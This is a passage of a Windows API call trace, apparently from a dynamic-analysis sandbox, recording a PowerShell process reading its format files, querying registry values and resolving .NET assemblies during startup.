lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.358] GetLastError () returned 0x0 [0076.358] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.358] GetLastError () returned 0x0 [0076.359] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.359] GetLastError () returned 0x0 [0076.359] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.359] GetLastError () returned 0x0 [0076.360] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0xaca, lpOverlapped=0x0) returned 1 [0076.360] GetLastError () returned 0x0 [0076.360] ReadFile (in: hFile=0x328, lpBuffer=0x2eb220a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb220a*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.360] GetLastError () returned 0x0 [0076.360] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.360] GetLastError () returned 0x0 [0076.360] CloseHandle (hObject=0x328) returned 1 [0076.360] GetLastError () returned 0x0 [0076.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.360] GetLastError () returned 0x0 [0076.360] SetErrorMode (uMode=0x1) returned 0x1 [0076.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ed3b9c | out: lpFileInformation=0x2ed3b9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0076.360] GetLastError () returned 0x0 [0076.360] SetErrorMode (uMode=0x1) returned 0x1 [0076.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.360] GetLastError () returned 0x0 [0076.361] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x328) returned 0x0 [0076.361] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.361] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.361] RegCloseKey (hKey=0x328) returned 0x0 [0076.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.361] GetLastError () returned 0x0 [0076.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.361] GetLastError () returned 0x0 [0076.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0076.378] GetLastError () returned 0x0 [0076.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.380] GetLastError () returned 0x57 [0076.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0076.389] GetLastError () returned 0x57 [0076.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.395] GetLastError () returned 0x57 [0076.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0076.397] GetLastError () returned 0x57 [0076.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0076.406] GetLastError () returned 0x57 [0076.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0076.413] GetLastError () returned 0x57 [0076.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0076.415] GetLastError () returned 0x57 [0076.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0076.425] GetLastError () returned 0x57 [0076.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0076.432] GetLastError () returned 0x57 [0076.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0076.433] GetLastError () returned 0x57 [0076.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0076.434] GetLastError () returned 0x57 [0076.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0076.435] GetLastError () returned 0x57 [0076.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0076.436] GetLastError () returned 0x57 [0076.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0076.439] GetLastError () returned 0x57 [0076.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0076.440] GetLastError () returned 0x57 [0076.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.440] GetLastError () returned 0x57 [0076.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0076.440] GetLastError () returned 0x57 [0076.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.440] GetLastError () returned 0x57 [0076.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.441] GetLastError () returned 0x57 [0076.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.441] GetLastError () returned 0x57 [0076.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.441] GetLastError () returned 0x57 [0076.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.441] GetLastError () returned 0x57 [0076.486] VirtualQuery (in: lpAddress=0xacf30, lpBuffer=0xadf30, dwLength=0x1c | out: lpBuffer=0xadf30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.494] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x72ae9358, Data2=0xcb21, Data3=0x4d56, Data4=([0]=0x86, [1]=0xc2, [2]=0x4, [3]=0x3f, [4]=0x31, [5]=0x19, [6]=0x70, [7]=0x7))) returned 0x0 [0076.495] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xaa8bb57f, Data2=0xf722, Data3=0x4e6b, Data4=([0]=0xb8, [1]=0x84, [2]=0x19, [3]=0x4f, [4]=0xd1, [5]=0xa8, [6]=0x57, [7]=0x22))) returned 0x0 [0076.495] VirtualQuery (in: lpAddress=0xacfa8, lpBuffer=0xadfa8, dwLength=0x1c | out: lpBuffer=0xadfa8*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.495] VirtualQuery (in: lpAddress=0xacfa8, lpBuffer=0xadfa8, dwLength=0x1c | out: lpBuffer=0xadfa8*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.496] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xf50a0e27, Data2=0x4eda, Data3=0x490b, Data4=([0]=0xb0, [1]=0xf7, [2]=0x4a, [3]=0xb3, [4]=0x66, [5]=0x5c, [6]=0xe0, [7]=0xe9))) returned 0x0 [0076.498] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x751069be, Data2=0x987a, Data3=0x4c00, Data4=([0]=0xa1, [1]=0xe, [2]=0xf5, [3]=0x3b, [4]=0x5, [5]=0xd3, [6]=0x9c, [7]=0x8c))) returned 0x0 [0076.498] VirtualQuery (in: lpAddress=0xad0d4, lpBuffer=0xae0d4, dwLength=0x1c | out: lpBuffer=0xae0d4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.498] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.499] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.499] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x31efa53b, Data2=0x34d5, Data3=0x4268, Data4=([0]=0xa9, [1]=0x19, [2]=0xb0, [3]=0xe7, [4]=0xc3, [5]=0x7e, [6]=0xfd, [7]=0x1d))) returned 0x0 [0076.499] VirtualQuery (in: lpAddress=0xad0d4, lpBuffer=0xae0d4, dwLength=0x1c | out: lpBuffer=0xae0d4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.499] VirtualQuery (in: lpAddress=0xacfec, lpBuffer=0xadfec, dwLength=0x1c | out: lpBuffer=0xadfec*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.500] VirtualQuery (in: lpAddress=0xacca0, lpBuffer=0xadca0, dwLength=0x1c | out: lpBuffer=0xadca0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.500] VirtualQuery (in: lpAddress=0xacca0, lpBuffer=0xadca0, dwLength=0x1c | out: lpBuffer=0xadca0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.500] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x909a934f, Data2=0x4dda, Data3=0x47a1, Data4=([0]=0xb5, [1]=0xa0, [2]=0x43, [3]=0x78, [4]=0x31, [5]=0xb, [6]=0x2, [7]=0xa3))) returned 0x0 [0076.500] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x2178b4ff, Data2=0x85b9, Data3=0x48d6, Data4=([0]=0x89, [1]=0xc3, [2]=0xb4, [3]=0xd2, [4]=0xa9, [5]=0x1b, [6]=0xd8, [7]=0x1e))) returned 0x0 [0076.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadcec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.500] GetLastError () returned 0x57 [0076.500] SetErrorMode (uMode=0x1) returned 0x1 [0076.500] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0076.501] GetLastError () returned 0x0 [0076.501] GetFileType (hFile=0x358) returned 0x1 [0076.501] SetErrorMode (uMode=0x1) returned 0x1 [0076.501] GetFileType (hFile=0x358) returned 0x1 [0076.501] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.503] GetLastError () returned 0x0 [0076.503] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.505] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.505] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.505] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.505] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.505] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.505] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.505] GetLastError () returned 0x0 [0076.506] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.506] GetLastError () returned 0x0 [0076.507] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.507] GetLastError () returned 0x0 [0076.507] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.507] GetLastError () returned 0x0 [0076.507] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.507] GetLastError () returned 0x0 [0076.507] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.507] GetLastError () returned 0x0 [0076.507] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.507] GetLastError () returned 0x0 [0076.508] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.508] GetLastError () returned 0x0 [0076.508] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.508] GetLastError () returned 0x0 [0076.509] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.509] GetLastError () returned 0x0 [0076.510] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0xbce, lpOverlapped=0x0) returned 1 [0076.510] GetLastError () returned 0x0 [0076.510] ReadFile (in: hFile=0x358, lpBuffer=0x2db913a, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db913a*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.510] GetLastError () returned 0x0 [0076.510] ReadFile (in: hFile=0x358, lpBuffer=0x2db99cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2db99cc*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.510] GetLastError () returned 0x0 [0076.510] CloseHandle (hObject=0x358) returned 1 [0076.510] GetLastError () returned 0x0 [0076.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.510] GetLastError () returned 